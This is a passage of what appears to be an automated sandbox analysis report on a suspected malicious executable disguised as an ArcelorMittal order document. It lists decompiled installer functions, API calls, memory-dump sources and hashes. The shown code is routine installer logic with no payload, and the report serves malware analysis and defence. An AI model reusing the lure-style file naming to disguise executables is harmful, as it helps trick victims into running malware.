							if(_t11 != 0) {
								_t11 = E00406054(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x818;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                0x00403b55
                                                0x00403b5a
                                                0x00403b60
                                                0x00403b65
                                                0x00403b65
                                                0x00403b6d
                                                0x00000000
                                                0x00000000
                                                0x00403b75
                                                0x00403b7d
                                                0x00403b7f
                                                0x00403b85
                                                0x00403b85
                                                0x00403b87
                                                0x00403b93
                                                0x00000000
                                                0x00000000
                                                0x00403b97
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403b99
                                                0x00403b9e
                                                0x00403ba7
                                                0x00403bad
                                                0x00403bb2
                                                0x00403bc6
                                                0x00403bd1
                                                0x00403be9
                                                0x00403bef
                                                0x00403bf4
                                                0x00403bfc
                                                0x00403c1d
                                                0x00403c1d
                                                0x00403c1d
                                                0x00403bfe
                                                0x00403c00
                                                0x00403c00
                                                0x00403c04
                                                0x00403c0b
                                                0x00403c0b
                                                0x00403c10
                                                0x00403c16
                                                0x00403c16
                                                0x00000000
                                                0x00403c00
                                                0x00403bb4
                                                0x00403bb9
                                                0x00403bc2
                                                0x00403bbb
                                                0x00403bbb
                                                0x00403bbb
                                                0x00403bb9

                                                APIs
                                                • SetWindowTextW.USER32(00000000,Overcaustically Setup), ref: 00403BE9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID: 1033$Overcaustically Setup
                                                • API String ID: 530164218-3667396766
                                                • Opcode ID: 73e21ad5ffa932d89d7705433f4a385169624a21009188ee896e041d0e727551
                                                • Instruction ID: e987bbb99f4ce20eb3fe8b814340f1a9c458372fd2df2122c6df2ee7e0325558
                                                • Opcode Fuzzy Hash: 73e21ad5ffa932d89d7705433f4a385169624a21009188ee896e041d0e727551
                                                • Instruction Fuzzy Hash: 1D11D132B046109BC724DF15DC80A7777BCEBC6719728C17BE901A73A2DA3DAE018799
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405105 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 89%
                                                			E00405105(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f2c != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f2c = _t16;
							E00404ADB();
						}
						L11:
						return CallWindowProcW( *0x7a1f34, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404A5B(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404142(0x413);
				return 0;
			}





                                                0x00405109
                                                0x00405113
                                                0x0040512f
                                                0x00405151
                                                0x00405154
                                                0x0040515a
                                                0x00405164
                                                0x00405165
                                                0x00405167
                                                0x0040516d
                                                0x0040516d
                                                0x00405177
                                                0x00000000
                                                0x00405185
                                                0x0040513c
                                                0x00405174
                                                0x00405174
                                                0x00000000
                                                0x00405174
                                                0x00405148
                                                0x0040514a
                                                0x00000000
                                                0x0040514a
                                                0x00405119
                                                0x00000000
                                                0x00000000
                                                0x00405120
                                                0x00000000

                                                APIs
                                                • IsWindowVisible.USER32 ref: 00405134
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405185
                                                  • Part of subcall function 00404142: SendMessageW.USER32(000103AE,00000000,00000000,00000000), ref: 00404154
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 555dd6184ff58a02eec7ea7395712ea6493033a95aca245b2aa61cc483e9b19e
                                                • Instruction ID: dd95526c2c69af2e2475994b1a4b7019860870cbffabe27cf4c45e442f77114e
                                                • Opcode Fuzzy Hash: 555dd6184ff58a02eec7ea7395712ea6493033a95aca245b2aa61cc483e9b19e
                                                • Instruction Fuzzy Hash: 80015A7190060CAFEF219F25DD80FAB3A26EB85354F108136FA047E2D1C77A8C919E6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004037E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004037E6() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x79ff04; // 0x87fa28
				_t3 = E004037CB(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x79ff04 =  *0x79ff04 & 0x00000000;
				return _t3;
			}







                                                0x004037e7
                                                0x004037ef
                                                0x004037f6
                                                0x004037f9
                                                0x004037f9
                                                0x004037fb
                                                0x00403800
                                                0x00403807
                                                0x0040380d
                                                0x00403811
                                                0x00403812
                                                0x0040381a

                                                APIs
                                                • FreeLibrary.KERNEL32(?,772EFAA0,00000000,C:\Users\user~1\AppData\Local\Temp\,004037BE,004035D3,?), ref: 00403800
                                                • GlobalFree.KERNEL32 ref: 00403807
                                                Strings
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004037E6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                • API String ID: 1100898210-2382934351
                                                • Opcode ID: cd6be415db01051891a2bbdb2ac2360d1775ad133b1b133e2abe0c5c00c63f81
                                                • Instruction ID: 7b5e820bad8908d6e9c5a6129ef56ed4de620d6e951f9557df5b5d2d3b1225d2
                                                • Opcode Fuzzy Hash: cd6be415db01051891a2bbdb2ac2360d1775ad133b1b133e2abe0c5c00c63f81
                                                • Instruction Fuzzy Hash: 90E08C334115205BC6211F14AA04B2A76BC6F49F22F19802FF880BB2608B781C424AC8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405A32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E00405A32(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                0x00405a33
                                                0x00405a3d
                                                0x00405a40
                                                0x00405a46
                                                0x00405a47
                                                0x00405a48
                                                0x00405a50
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405a50
                                                0x00405a52
                                                0x00405a5a

                                                APIs
                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405A38
                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405A48
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-3976562730
                                                • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                • Instruction ID: 324b1dc390856c450e544e32c4aad69d139446a74aa4c59c68e3560d72017bd2
                                                • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                • Instruction Fuzzy Hash: 1FD05EB2400D209AD322A704DC44EAF63A8FF51300786886AF941A61A1D7785C818EA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}





















                                                0x100010e6
                                                0x100010f0
                                                0x100010ff
                                                0x1000110e
                                                0x10001119
                                                0x1000111c
                                                0x1000112b
                                                0x1000112f
                                                0x10001131
                                                0x100011d8
                                                0x100011de
                                                0x10001137
                                                0x10001138
                                                0x10001138
                                                0x1000113d
                                                0x1000113e
                                                0x10001140
                                                0x10001143
                                                0x1000120d
                                                0x10001210
                                                0x100011b0
                                                0x100011b6
                                                0x100011bf
                                                0x100011c4
                                                0x100011c7
                                                0x00000000
                                                0x100011c7
                                                0x10001212
                                                0x10001214
                                                0x10001196
                                                0x1000119d
                                                0x100011a5
                                                0x00000000
                                                0x100011a5
                                                0x10001161
                                                0x10001162
                                                0x1000116a
                                                0x10001177
                                                0x1000117f
                                                0x10001188
                                                0x1000118d
                                                0x1000118d
                                                0x00000000
                                                0x10001162
                                                0x10001149
                                                0x100011df
                                                0x100011df
                                                0x100011e6
                                                0x100011f3
                                                0x100011f8
                                                0x100011fb
                                                0x10001203
                                                0x10001205
                                                0x10001205
                                                0x00000000
                                                0x100011e6
                                                0x1000114f
                                                0x10001152
                                                0x00000000
                                                0x00000000
                                                0x10001158
                                                0x1000115b
                                                0x100011ac
                                                0x00000000
                                                0x100011ac
                                                0x1000115d
                                                0x1000115f
                                                0x10001192
                                                0x00000000
                                                0x10001192
                                                0x00000000
                                                0x100011c9
                                                0x100011c9
                                                0x100011d3
                                                0x00000000
                                                0x100011d7

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405B6C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405B6C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                0x00405b7c
                                                0x00405b7e
                                                0x00405b81
                                                0x00405bad
                                                0x00405b86
                                                0x00405b8f
                                                0x00405b94
                                                0x00405b9f
                                                0x00405ba2
                                                0x00405bbe
                                                0x00405ba4
                                                0x00405bab
                                                0x00000000
                                                0x00405bab
                                                0x00405bb7
                                                0x00405bbb
                                                0x00405bbb
                                                0x00405bb5
                                                0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405B7C
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405B94
                                                • CharNextA.USER32(00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA5
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405BAE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                • Instruction ID: 7563504597b604d9a211119aa68f0a7f164f23f923bb21cff999b965ed3bd4a6
                                                • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                • Instruction Fuzzy Hash: DCF0C231105818AFD7029FA5DD0099FBBB8EF55250B2540A9E840F7210D674FE019B68
                                                Uniqueness

                                                Uniqueness Score: -1.00%